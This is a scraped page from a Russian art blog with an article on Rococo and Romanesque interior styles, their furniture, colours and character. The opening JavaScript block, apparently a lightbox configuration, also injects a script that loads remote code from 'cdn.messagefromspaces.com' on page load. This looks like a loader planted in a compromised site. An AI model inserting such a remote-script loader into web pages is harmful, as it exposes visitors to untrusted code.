, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Стиль Рококо и Романский стиль

Автор: Наталья Юрова | 07 Май 2013

Википедия повествует нам, что  Рококо́ (фр. rococo, от фр. Rocaille -  дробленый камень, декоративная раковина, ракушка, рокайль, реже рококо) - стиль в искусстве (в основном, в дизайне интерьеров), возникший во Франции в первой половине XVIII века (во время регентства Филиппа Орлеанского) как развитие стиля барокко.

Основные черты направления – утонченность, изобилие декоративности, акцент на мифологии, комфорт.

Стиль интерьера РококоРококо пришло на смену барокко и в отличие от него, насаждало изящную гамму. Именно в расцвет Рококо отмечается  бегство от реальной жизни в фантазийный мир  мифических сюжетов с элементами эротики. Поэтому в эпоху рококо так трудно найти по настоящему серьезные работы мастеров: они слишком декоративны и поверхностны.  Поэтому возникает мода на китайское искусство: китайский фарфор, гобелен, тонкоствольные деревья и разноцветные орхидеи, аквариумы с рыбками и т. д.
Материал взят с ресурса http://www.lirikalive.ru/news
Интерьер жилья представлял собой ассиметрично расположенные комнаты. В центре жилища располагалась парадная комната. Комнаты имеют скругленные углы, стены украшены орнаментами из позолоты, резьбой, зеркалами. Сами комнаты по ширине и высоте имеют меньшие размеры, чем в стиле барокко, что создает обстановку интимности.

стиль РококоЦветовая гамма – пастельные тона, сочетание белого со светлыми оттенками желтого, голубого, розового, с элементами золота.

Рококо стал воплощением целостности, единства. Временем, когда архитектура, декор, цвет, мебель, предметы интерьера выполнялись в одном стиле.  Так как эта эпоха – время вознесения женщины, то в интерьере появляются чисто женские предметы мебели:  секретер, картоньерка (тумба для бумаг), торшер с зеркалом, комоды.

Центральное место занимает камин, уставленный фарфоровыми статуэтками, часами, канделябрами, прочими безделушками. Роскошными дорогими хрупкими произведениями искусства изобилует все жилище. Стиль Рококо – чисто женский стиль, карнавальный, будуарный и театрализованный.

Романский (римский) стиль возник в конце XI начале XII веков в Западной Европе и отражает смешение древнеримского и византийского.

Романский интерьерРоманская архитектура – это замки и монастыри, возведенные из камня, которые больше напоминали  неприступные мрачные крепости, нежели сказочные дворцы. В каждом замке был храм, который является центральным местом жизни горожан. Религия в культуре в то время занимала ведущее место.

Мебель – массивная, довольно примитивная. Сундуки считались основной мебелью романской эпохи, использовались как кровать, лавка, тумба для хранения разных вещей. Сначала они были громоздкими и простыми по конструкции. Со временем у них появились ножки, цверцы, изменилась форма: сундуки стали больше походить на невысокие шкафы.  Если говорить о стульях, то они имели высокие ножки и спинки, у них отсутствовала мягкая обивка, сиденье обтягивалось холстом, покрывалось слоем гипса и покрывалось узором из краски. Чем выше спинка у стула, тем выше титул его владельца.  Позднее примитивная мебель преобразилась резьбой и ковкой.

Конечно же, мебель знати была более функциональной и комфортной. Так, кровати покрывали балдахины. Полы были выстланы коврами Востока.

Романский стиль – отражение духа и эстетики религии: строгий и без излишеств, придется по вкусу серьезным, деловым людям.

Темы: Интерьер | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress